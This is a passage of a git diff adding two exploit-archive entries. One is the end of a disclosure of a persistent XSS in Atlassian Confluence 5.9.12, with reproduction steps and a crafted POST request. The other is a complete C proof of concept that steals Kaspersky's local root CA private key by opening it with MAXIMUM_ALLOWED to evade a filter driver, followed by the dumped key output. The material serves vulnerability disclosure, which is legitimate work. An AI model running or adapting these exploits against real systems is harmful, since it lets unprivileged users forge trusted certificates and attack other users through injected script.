attacks against other users. + +=====[2. Detailed description]================================================ + +Atlassian Confluence version 5.9.12 is vulnerable to persistent cross-site +scripting (XSS) because it fails to securely validate user controlled data, +thus making it possible for an attacker to supply crafted input in order to +harm users. The bug occurs at pages carrying attached files, even though +the attached file name parameter is correctly sanitized upon submission, it is +possible for an attacker to later edit the attached file name property and +supply crafted data (i.e HTML tags and script code) without the +occurrence of any security checks, resulting in an exploitable persistent XSS. + +In order to reproduce the vulnerability, go to a page with an attached +file, click on "Attachments" in order to list the page's attachments, and then +click on "Properties" for the file of your choice. Edit the file name to, for +example, test.pdf and then save the changes. +Albeit the XSS is not executed within the page display, it is possible to +trigger the execution of the supplied code while performing a search within +Confluence in which results include the attachment with crafted file name. For that +matter, the search terms " or * will promptly display the file and execute the +injected javascript code. + +As a means to further enlighten this, the following excerpt demonstrates +a POST request with the malicious insertion within the newFileName field: + +POST +/pages/doeditattachment.action?pageId={pageId}&attachmentBean.fileName={filename} HTTP/1.1 +Host: {confluence host} +Cookie: mywork.tab.tasks=false; JSESSIONID={redacted}; +confluence.browse.space.cookie=space-templates +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: {redacted} + +atl_token={atl_token}&pageId={pageId}&isFromPageView=false&newFileName=file&newComment=&newContentType=application%2Foctet-stream&newParentPage=&confirm=Save + +It is worth noting that the issue may affect users regardless of privilege +levels, since the malicious page/attachment can be browsed by any user +within the Atlassian Confluence instance. + +=====[3. Affected versions & Solutions]======================================= + +This test was performed against Atlassian Confluence version 5.9.12. + +According to vendor's response, the vulnerability is addressed and the +fix is part of the 5.10.6 release. + +=====[4. Timeline of disclosure]============================================== + +Jul/07/2016 - Vendor acknowledged the vulnerability. +Aug/04/2016 - Vendor released the fix for the vulnerability in version 5.10.6. + +=====[5. Thanks & Acknowledgements]=========================================== + + - Tempest Security Intelligence / Tempest's Pentest Team [1] + - Joaquim Brasil + - Heyder Andrade + - Breno Cunha + +=====[6. References]========================================================== + +[1] https://en.wikipedia.org/wiki/Confluence_(software) \ No newline at end of file diff --git a/platforms/windows/local/40988.c b/platforms/windows/local/40988.c new file mode 100755 index 000000000..6541e7a02 --- /dev/null +++ b/platforms/windows/local/40988.c @@ -0,0 +1,67 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=989 + +When Kaspersky generate a private key for the local root, they store the private key in %ProgramData%. Obviously this file cannot be shared, because it's the private key for a trusted local root certificate and users can use it to create certificates, sign files, create new roots, etc. If I look at the filesystem ACLs, I should have access, and was about to complain that they've done this incorrectly, but it doesn't work and it took me a while to figure out what they were doing. + +$ icacls KLSSL_privkey.pem +KLSSL_privkey.pem BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(RX) <-- All users should have read access + NT AUTHORITY\SYSTEM:(I)(F) + +Successfully processed 1 files; Failed processing 0 files +$ cat KLSSL_privkey.pem +cat: KLSSL_privkey.pem: Permission denied + +Single stepping through why this fails, I can see their filter driver will deny access from their PFLT_POST_OPERATION_CALLBACK after checking the Irpb. That sounds difficult to get right, and reverse engineering the filter driver, I can see they're setting Data->IoStatus.Status = STATUS_ACCESS_DENIED if the Irpb->Parameters (like DesiredAccess or whatever) don't match a hardcoded bitmask. + +But the blacklist is insufficient, they even missed MAXIMUM_ALLOWED (?!!!). This is trivial to exploit, any unprivileged user can now become a CA. +*/ + +#include +#include +#include +#include + +int main(int argc, char **argv) +{ + HANDLE File; + BYTE buf[2048] = {0}; + DWORD count; + + File = CreateFile("c:\\ProgramData\\Kaspersky Lab\\AVP17.0.0\\Data\\Cert\\KLSSL_privkey.pem", + MAXIMUM_ALLOWED, + FILE_SHARE_READ | FILE_SHARE_WRITE, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL); + if (File != INVALID_HANDLE_VALUE) { + if (ReadFile(File, buf, sizeof(buf), &count, NULL) == TRUE) { + setmode(1, O_BINARY); + fwrite(buf, 1, count, stdout); + } + CloseHandle(File); + return 0; + } + return 1; +} + +/* +$ cl test.c +Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86 +Copyright (C) Microsoft Corporation. All rights reserved. + +test.c +Microsoft (R) Incremental Linker Version 12.00.31101.0 +Copyright (C) Microsoft Corporation. All rights reserved. + +/out:test.exe +test.obj +$ ./test.exe | openssl rsa -inform DER -text -noout +Private-Key: (2048 bit) +modulus: + 00:b4:3f:57:21:e7:c3:45:e9:43:ec:b4:83:b4:81: + bb:d3:3b:9b:1b:da:07:55:68:e0:b1:75:38:b9:66: + 0d:4c:e4:e7:f3:92:01:fb:33:bf:e6:34:e4:e8:db: + f1:7c:53:bc:95:2c:2d:08:8d:7c:8c:03:71:cd:07: +*/ \ No newline at end of file